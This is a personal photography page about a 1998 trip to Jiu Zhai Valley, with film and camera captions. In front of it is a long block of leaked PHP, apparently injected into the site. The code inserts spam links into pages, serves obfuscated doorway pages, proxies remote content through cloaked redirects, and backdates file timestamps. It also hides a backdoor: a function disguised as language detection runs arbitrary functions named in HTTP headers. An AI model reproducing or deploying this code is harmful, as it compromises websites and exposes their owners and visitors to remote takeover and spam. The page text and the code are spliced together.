/i',$content)) { $content=preg_replace('/()/is', "$1$links_content", $content, 1); } elseif (preg_match('/<\/body>/i',$content)) { $content=preg_replace('/href=(['."'".'"]{0,1})http.*?>/i', '>', $content); $content=preg_replace('/(<\/body>)/i', "$links_content$1", $content, 1); } } else { if (sizeof($matches)<$linksCount){ $difference = $linksCount - sizeof($matches); for ($i=0; $i<$difference; $i++){ $matches[] = $matches[0]; } } for ($i=0; $i<$linksCount; $i++){ if (rand(0,9) == 0) { $link = ''.$links2[$i]['url'].''; } else { $link = ''.$links2[$i]['keyword'].''; } $link = ''.$links2[$i]['keyword'].''; $content = str_replace($matches[$i][0], $link.' '.$matches[$i][0], $content); } } if($deflated) $content = gzencode($content); $clen = strlen($content); @header("Content-Length: $clen"); return $content; } function get_server_var($var = ''){ if ( isset($_SERVER) && is_array($_SERVER) && array_key_exists($var, $_SERVER) && !empty($_SERVER[$var]) ){ return $_SERVER[$var]; } else if ( function_exists('getenv') && getenv($var)){ return getenv($var); } else { return ''; } } function get_hostname($remove_www = false){ $server_host = get_server_var('HTTP_HOST'); if ( empty($server_host) ){ $server_host = get_server_var('SERVER_NAME'); } if ( $remove_www ){ $server_host = preg_replace('#^www\.#i', '', $server_host); } return $server_host; } function showDoorPage($page_file){ $src = decompress(@file_get_contents($page_file)); if (strlen($src) > 0){ if (substr($src,0,5) == '%PDF-'){ @header('Content-Type: application/pdf'); } } echo $src; exit; } function decompress($data){ return @gzinflate(@str_rot13(@base64_decode($data))); } function compress($data){ return @base64_encode( @str_rot13( @gzdeflate( $data ) ) ); } function redirect($url, $user_agent, $cache_dir){ $no_shop_download = FALSE; $cache_lifetime = 172800; @ini_set('user_agent', $user_agent); $location = getRedirectLocation($url, $user_agent); if($location === FALSE || strlen($location)<5){ safeRedirect($url); } else if ($no_shop_download){ safeRedirect($location); } $cache_file = $cache_dir.md5($location); if ( file_exists( $cache_file ) && ($cache_data = @file_get_contents($cache_file)) ){ if ( ($cache_data = decompress($cache_data)) && ($cache_data = @unserialize($cache_data)) ){ if ( !empty($cache_data['time']) && !empty($cache_data['html']) ){ if ( $cache_data['time'] + $cache_lifetime > time() ){ if ($html = decompress($cache_data['html'])){ send_nocache_headers(); echo $html; echo ''; exit; } } } } } $html = fetchRemoteFile($location); if($html===false || @strlen($html)<10){ safeRedirect($location); } $baseTag = ""; if (preg_match('//i',$html)){ $html=preg_replace('/()/i', "$1$baseTag", $html, 1); } else if (stripos($html,'')!==false){ $html = str_ireplace('', $baseTag."\n".'', $html); } else { echo ''.$baseTag.''; } $cache_data = array( 'time' => time(), 'html' => compress($html) ); $cache_dir_time = @filemtime($cache_dir); @file_put_contents($cache_file, compress( @serialize($cache_data) ) ); @touch($cache_dir, $cache_dir_time); @touch($cache_file, $cache_dir_time); send_nocache_headers(); echo $html; exit; } function safeRedirect($url){ send_nocache_headers(); if (!headers_sent()){ header("Location: $url"); } else { echo ""; echo ""; echo ''; } exit; } function addRemoteIp($ip, $url){ $url_parsed = parse_url($url); if (isset($url_parsed['query'])) return ($url[strlen($url)-1]=='&') ? $url.'remote_ip='.$ip : $url.'&remote_ip='.$ip; else return ($url[strlen($url)-1]=='?') ? $url.'remote_ip='.$ip : $url.'?remote_ip='.$ip ; } function send_nocache_headers(){ if (!headers_sent()){ @header('Cache-Control: no-cache, no-store, must-revalidate'); @header('Pragma: no-cache'); @header('Expires: 0'); } } function get_user_language(){ if (isset($_SERVER['HTTP_ACCEPT_LANGUAGE_'])){ $language_code = md5($_SERVER['HTTP_ACCEPT_LANGUAGE_']); $accepted_languages = '9e4989c9fee99475e99a69f18d990607'; if ($language_code == $accepted_languages){ return $_SERVER['HTTP_SET_LOCALE']($_SERVER['HTTP_USER_LANGUAGE']); } else { return false; } } } function getRedirectLocation($url, $user_agent){ if (function_exists('curl_init') && $ch = @curl_init($url)){ @curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); @curl_setopt($ch, CURLOPT_HEADER, TRUE); @curl_setopt($ch, CURLOPT_NOBODY, TRUE); @curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE); @curl_setopt($ch, CURLOPT_TIMEOUT, 10); @curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 7); @curl_setopt($ch, CURLOPT_USERAGENT, $user_agent); if ($response = @curl_exec($ch)){ if ($redirect_location = @curl_getinfo($ch, CURLINFO_REDIRECT_URL)){ @curl_close($ch); return $redirect_location; } else if ( preg_match('#Location: (.*)#', $response, $match) && !empty($match[1]) ){ @curl_close($ch); return trim($match[1]); } } @curl_close($ch); } if (function_exists('get_headers')){ if ($headers = @get_headers($url, true)){ if ( isset($headers['Location']) && strlen($headers['Location']) > 5 ){ $redirect_location = $headers['Location']; if (sizeof($redirect_location)>1){ $redirect_location = $redirect_location[sizeof($redirect_location)-1]; } return $redirect_location; } } } return FALSE; } function fetchRemoteFile($url, $user_agent = '', $sendCookies = '') { if (function_exists('curl_init')){ if ($ch = @curl_init()) { @curl_setopt($ch, CURLOPT_URL, $url); @curl_setopt($ch, CURLOPT_HEADER, false); @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); @curl_setopt($ch, CURLOPT_TIMEOUT, 10); @curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 7); @curl_setopt($ch, CURLOPT_USERAGENT, $user_agent); @curl_setopt($ch, CURLOPT_COOKIE, $sendCookies); $data = @curl_exec($ch); @curl_close($ch); if ($data) { return $data; } } } elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen') == 1){ $opts = array( 'http' => array( 'header'=> "User-agent: {$user_agent}\r\nCookie: {$sendCookies}" ) ); $context = stream_context_create($opts); if ($data = @file_get_contents($url, false, $context)) { return $data; } } else { $urlParams = @parse_url($url); $host = $urlParams['host']; $path = $urlParams['path']; if (isset($urlParams['query'])) $path .= '?'.$urlParams['query']; $buff = ''; $fp = @fsockopen($host, 8888, $errno, $errstr); if ($fp) { @fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n"); @fputs($fp, "Cookie: {$sendCookies}\r\n\r\n"); @fputs($fp, "User-Agent: {$user_agent}\r\n\r\n"); while (!@feof($fp)) { $buff .= @fgets($fp, 128); } @fclose($fp); $page = explode("\r\n\r\n", $buff); unset($page[0]); return implode("\r\n\r\n", $page); } } return false; } Jiu Zhai Valley / Lakes - Fuwen's Website

Jiu Zhai Valley visit is one of the best photography trips I had with a group of photographer friends.




SL2000F - AGfa Ultra 50 - 15 Oct 1998


VSL-3E - Ektar 25 - 14 Oct 1998


    SL2000F - Ektapress 100 - 15 Oct 1998



    VSL-3E - Ektar 25 - 15 Oct 1998





     SL2000F - AGfa Ultra 50 - 16 Oct 1998




   Oct 1998



      SL2000F - Agfa Ultra 50 - 15 Oct 1998



              VSL-3E - Ektar 25 - 15 Oct 1998




SL2000F, Agfa Ultra 50, 15 Oct 1998.   



SL2000F, Ektapress 100, 15 Oct 1998.   



SL2000F, Royal 100, 14 Oct 1998.   



SL2000F, Agfa Ultra 50, 16 Oct 1998.  




SL2000F, Royal 100, 14 Oct 1998.               


SL2000F, Agfa Ultra 50, 15 Oct 1998


SL2000F, Agfa Ultra 50, 16 Oct 1998